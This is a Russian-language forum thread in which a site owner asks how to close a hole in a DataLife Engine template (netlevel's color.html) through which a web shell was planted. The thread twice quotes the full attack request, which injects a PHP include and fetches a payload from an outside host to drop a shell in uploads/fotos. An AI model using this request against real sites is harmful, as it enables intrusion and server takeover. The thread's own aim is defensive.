Поиск Способ защиты от color.html

Kewl · 24 Янв 2010

сайт/templates/netlevel/bbcodes/color.html?install=

/templates/netlevel/bbcodes/color.html?install=<?include('conect.php');?>&file=dbconfig.php&&path=engine/data/&&url=http://vip-base.ws/upload/36hd4635dbnxfslqrmcbaffl78243kgm/&path2_shell=uploads/fotos HTTP/1.0" 200 7677 "-" "-"

как закрыть эту дырку?

Вирус лег в uploads/fotos

Спасибо.

cat13 · 24 Янв 2010

После обращений таким запросом как ты дал просто вылазит колор таблица.

saxel · 24 Янв 2010

посомтри в файле ./engine/modules/bbcodes.php
думаю оно там... и не используйте нуллы подозрительные(думаю у вас нулл, или извените, если ошибся

)

Kewl · 24 Янв 2010

saxel написал(а):
посомтри в файле ./engine/modules/bbcodes.php
думаю оно там... и не используйте нуллы подозрительные(думаю у вас нулл, или извените, если ошибся)

Подскажите проверенный) лучше ссылкой прям)

Добавлено через 44 минуты
в общем дыра оказалась в шаблоне netlevel.
потестил на других шаблонах - не работает.
а в данном работало сайт/templates/netlevel/bbcodes/color.html?install=%3C?include(%27conect.php%27);?%3E&file=dbconfig.php&&path=engine/data/&&url=http://vip-base.ws/upload/36hd4635dbnxfslqrmcbaffl78243kgm/&path2_shell=uploads/fotos
шаблон снес, надеюсь теперь шелл никто не зальет =)

acelotuse · 25 Янв 2010

а откуда шаблон-то скачивали? С какого сайта, помните?

Kewl · 25 Янв 2010

acelotuse написал(а):
а откуда шаблон-то скачивали? С какого сайта, помните?

с дле in ua, спасибо.. на самом деле сам шаблон был таким... Вдруг у кого-то будет данная проблема.. меняйте шаблон.. но дырка "добрая"!, так же совет попробуйте рипы все свои проверить данной строчкой.

Еще раз спасибо, тем кто помогал.

Поиск Способ защиты от color.html

Kewl

Постоялец

cat13

Постоялец

saxel

Постоялец

Kewl

Постоялец

acelotuse

Профессор

Kewl

Постоялец